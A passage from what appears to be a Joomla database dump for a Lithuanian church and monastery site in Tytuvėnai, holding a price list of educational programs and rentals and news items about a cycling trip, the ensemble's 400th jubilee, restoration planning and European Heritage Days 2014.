align=\"center\">4,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">16.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa „Su maldos vėriniu per pasaulį“</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">4,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">17.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa ,,Vienuolių pietūs‘‘</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">10,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">18.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa „Dekoravimas skystu metalu“</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">6,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">19.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Fotosesija vienuolyne (vienuolyno viduje, teritorijoje)</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">30,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">20.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Refektorinės salės, vidinio kiemelio, rūsio patalpų nuoma kultūriniams renginiams</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">50,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">21.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Refektorinės salės, vidinio kiemelio, rūsio patalpų nuoma komerciniams renginiams</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">100,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">22.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Refektorinės salės, vidinio kiemelio, rūsio patalpų nuoma už papildomas valandas</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">80,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">23.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p> Piligrimų namai \"Domus Rafaeli\" </p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\"><span>1 asm./paros nuoma</span></p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">20,00 eur</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,53,'2013-05-28 10:43:45',135,'','2024-06-18 13:33:45',135,135,'2024-06-18 13:33:45','2013-05-28 10:43:45','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',42,0,3,'','',1,17504,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(316,405,'Dviračių žygis','dviraciu-zygis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Birželio 2 d. 10 val. 30 min. organizuojamas dviračių žygis.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/stories/naujienos/zygis/zygis.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2018-05-24 15:55:17',135,'','2018-05-24 15:55:47',135,0,'0000-00-00 00:00:00','2018-05-24 15:55:17','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/zygis\\/dviraciu_zygis.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,69,'','',1,2335,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(207,294,'Renginys 400 metų jubiliejui paminėti','renginys-400-metu-jubiliejui-pamineti','','<p><span style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Ar žinote, kad 2014 metai yra ypatingi Tytuvėnų Švč. M. Marijos bažnyčios ir vienuolyno ansambliui, bet ir Tytuvėnų miestelio gyventojams? Jei dar nežinojote, tai pranešame, kad šiais metais Tytuvėnų bažnyčios ir vienuolyno ansambliui sukan</span><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\">ka 400 metų nuo fundacijos akto pasirašymo.</span></p>\r\n','\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"> Fundatorius Andrius Valavičius pakvietė į Tytuvėnus bernardinų vienuolius ir Bažnyčios bei vienuolyno statybai skyrė žemės ir 10 000 auksinų. Taip prasidėjo, mūsų miestelio puošmenos ir pasididžiavimo,ansamblio statybų pradžia....<br /> Todėl kviečiame ir laukiame visus norinčius sudalyvauti mūsų renginyje 2014 m. rugpjūčios 17 d. ir paminėti šią gražią progą kartu.</span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/kvietimas20140817/kvietimas20140817.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2014-08-04 06:14:27',135,'','2014-08-04 06:17:43',135,0,'0000-00-00 00:00:00','2014-08-04 06:14:27','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kvietimas20140817\\/kvietimas20140817logo.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,162,'','',1,4014,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(208,295,'Paminėtas 400 metų jubiliejus ','paminetas-tytuvenu-baznycios-ir-vienuolyno-ansamblio-400-metu-jubiliejus','','<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Sekmadienio vidurdienį Tytuvėnų bažnyčios varpai kvietė visus į Šv. Mišias, skirtas Tytuvėnų Bažnyčios ir vienuolyno ansamblio 400 metų jubiliejui paminėti. Šv. Mišias aukojo J.E. Šiaulių Vyskupas Eugenijus Bartulis. Pamokslo metu Šiaulių Vyskupas džiaugėsi esame švente ir kvietė visus tikinčiuosius atsigręžti į Kristų ir savo vaikams kaip palikimą perduoti ne materialines vertybes, bet tikėjimo šviesą.</span></p>\r\n','\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"> Vienas iš įspūdingiausių šventės akcentų – Šiaulių vyskupo naujojo altoriaus patepimas krizmos aliejais, pašventinimas.<img src=\"images/stories/naujienos/400m_jubiliejus/1m.jpg\" border=\"0\" alt=\"\" /> </span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/400m_jubiliejus/DSC09277m.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\">Po Šv. Mišių vyskupas  Šiaulių vyskupijos kurijos  kancleris Evaldas Alūza perskaitė LR Prezidentės Dalios Grybauskaitės sveikinimo žodžius jubiliejaus proga. ,,...Žemaitijos neįsivaizduojame be Tytuvėnų, o Tytuvėnų – be bažnyčią ir vienuolyną čia įkūrusių brolių bernardinų bei statybas finansavusių Lietuvos Didžiosios Kunigaikštystės šviesuolių. Kurti ir gražinti savo kraštą, rūpintis jo žmonių stiprybe – tai darbai, kurių ir toliau mokykimės iš protėvių...‘‘. <br /></span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/400m_jubiliejus/DSC09268m.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\">Iškilmingame jubiliejaus minėjime dalyvavo  Lietuvos Respublikos Ministras Pirmininkas Algirdas Butkevičius. Sveikinimo kalboje sakė: ,,Mielieji, sveikindamas Jus šio jubiliejaus proga, linkiu ištvermės ir visokeriopos sėkmės Jūsų sumanymams ir darbams, skleidžiant tikėjimo šviesą mūsų Tėvynėje. Šv. Jono Pauliaus II žodžiais tariant, Dievo Motina teduos mūsų tautos žmonėms drąsos nugalėti materialinius ir moralinius sunkumus, tepadarys vaisingus jų rankų ir proto darbus, teapsaugos šeimų židinių džiaugsmą ir visuomeninio gyvenimo vienybę‘‘.</span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/400m_jubiliejus/IMG_8374m.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"> Po sveikinimo žodžio LR Ministras pirmininkas Algirdas Butkevičius Šiaulių vyskupui įteikė paveikslą, o vyskupas E. Bartulis savo ruoštu įteikė premjerui Švč. Dievo Motinos su Kūdikiu paveikslo reprodukciją ir knygą  ,,Tytuvėnų bažnyčia ir vienuolynas 400 metų‘‘.</span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\">Šventėje  dalyvavo ir sveikinimo žodžius tarė  garbingi svečiai t.y Seimo narys Kęstutis Masiulis, Kelmės rajono meras Vaclovas Andrulis, Kelmės rajono administracijos direktorė Irena Sirusienė.</span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\">Po sveikinimo žodžių ir vyskupo Eugenijaus Bartulio palaiminimo bažnyčioje prasmingai suskambo smuiko muzika. Smuiku griežė Karalienės Mortos premijos laureatė Gintė Grigaitytė. Naujos knygos ,,Tytuvėnų bažnyčia ir vienuolynas 400 metų‘‘ pristatymo metu parapijos klebonas Rimantas Žaromskis įteikė padėkas visiems prisidėjusiems prie knygos išleidimo. Knygą pristatė jos sudarytojai prof. hab. dr. Alfonsas Motuza ir dr. Liepa Griciūtė-Šveberienė. <br /></span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/400m_jubiliejus/IMG_8498m.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\">Kiek vėliau  šventės svečius nustebino maestro Virginijaus Noreikos ir vargonininkės Viktorijos Kazakevičiūtės pasirodymas ,,Istoriniams vargonams 250 metų‘‘.</span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\">Tytuvėnų bažnyčios ir vienuolyno 400 metų jubiliejaus iškilmes  vainikavo Klaipėdos  kvinteto brass  koncertas ,,Kad laimė lietųsi ant mūsų‘‘.<br /></span></p>',1,0,0,44,'2014-08-21 05:34:58',135,'','2014-08-21 05:36:04',135,0,'0000-00-00 00:00:00','2014-08-21 05:34:58','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/400m_jubiliejus\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,161,'','',1,4501,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(219,307,'Bažnyčios ir vienuolyno ateities planų aptarimas','baznycios-ir-vienuolyno-ansamblio-ateities-planu-aptarimas','','<p style=\"text-align: justify;\">Š.m. gruodžio 11 d. Tytuvėnų vienuolyne vyko susirinkimas, kurio metu buvo įvertinti ansamblio restauravimo darbai bei aptarti prioritetiniai darbai tolimesniam projektų įgyvendinimui pagal Europos Sąjungos ir valstybės biudžeto lėšomis finansuojamas programas.</p>\r\n','\r\n<p style=\"text-align: justify;\">Pirmiausia, susirinkimo dalyviai apžiūrėjo atliktus ansamblio restauravimo ir vienuolyno atstatymo po gaisro darbus. Tytuvėnų piligrimų centras baigė įgyvendinti du projektus: pirmasis yra vienuolyno atstatymo po 2012 m. gaisro projektas bei antrasis, skirtas Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios stogo keitimo bei fasadų restauravimo projektas, kurio metu buvo pakeistas bažnyčios stogas, retauruoti fasadai, pakeisti visi bažnyčios langai, restauruotos durys, įrengta priešgaisrinė ir apsauginė signalizacijos, atlikti kiti darbai.</p>\r\n<p style=\"text-align: justify;\">Aptariant ateities planus, buvo atkreiptas dėmesys dėl arkadinės galerijos, bažnyčios interjero bei tvoros su avarinės būklės vartais restauravimo darbų. Kelmės rajono savivaldybės meras Vaclovas Andrulis ir Kelmės rajono savivaldybės administracijos direktorė Irena Sirusienė pabrėžė, kad į Tytuvėnų miesto viešąją infrastruktūrą artimiausiu metu bus investuotos didelės lėšos: baigiamas ruošti centrinės dalies ir šalia ansamblio esančios teritorijos sutvarkymo techninis projektas. Kito projekto metu bus įrengta stovėjimo aikštelė šalia ansamblio ūkinių pastatų, tvarkomos šalia ansamblio esančios Maironio, Piliakalnio, Jablonskio gatvės.</p>\r\n<p style=\"text-align: justify;\">Susirinkimo metu nutarta parengti ansamblio arkadinės galerijos, bažnyčios interjero ir tvoros su vartais preliminarias sąmatas ir toliau rengti dokumentus būsimų paraiškų teikimui.</p>\r\n<p style=\"text-align: justify;\">Susirinkime dalyvavo Kultūros paveldo departamento direktorės pavaduotojas Algimantas Degutis, Kelmės rajono savivaldybės meras Vaclovas Andrulis, Administracijos direktorė Irena Sirusienė, Šiaulių vyskupijos kancleris Evaldas Alūza, Valstybės įmonės „Lietuvos paminklai“ direktoriaus pavaduotojas Jaunius Kavaliauskas, Tytuvėnų seniūnas Romas Čerkauskas bei daug kitų Tytuvėnams neabejingų žmonių, kuriems rūpi mūsų ansamblis bei jo ateitis.</p>\r\n<p style=\"text-align: justify;\">Ačiū visiems dalyvavusiems!<br /><br /></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/aptarimas/1.jpg\" border=\"0\" alt=\"\" /><br /><img src=\"images/stories/naujienos/aptarimas/2.jpg\" border=\"0\" alt=\"\" /><br /><img src=\"images/stories/naujienos/aptarimas/3.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2014-12-18 07:41:02',135,'','2014-12-18 07:42:21',135,135,'2014-12-18 07:42:21','2014-12-18 07:41:02','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/aptarimas\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,152,'','',1,3763,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(209,296,'2014 m. europos paveldo dienos','2014-m-europos-paveldo-dienos','','<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kelmės krašto muziejuje<br />2014-09-19 (penktadienį) 15 val.<br />2014 m. europos paveldo dienos<br />\"XX AMŽIAUS PRADŽIOS SKONIS\"</span></p>\r\n','\r\n<p> </p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/epd04/epd2014.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2014-09-08 05:19:02',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2014-09-08 05:19:02','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/epd04\\/europos_paveldo_dienos04.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,160,'','',1,3530,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}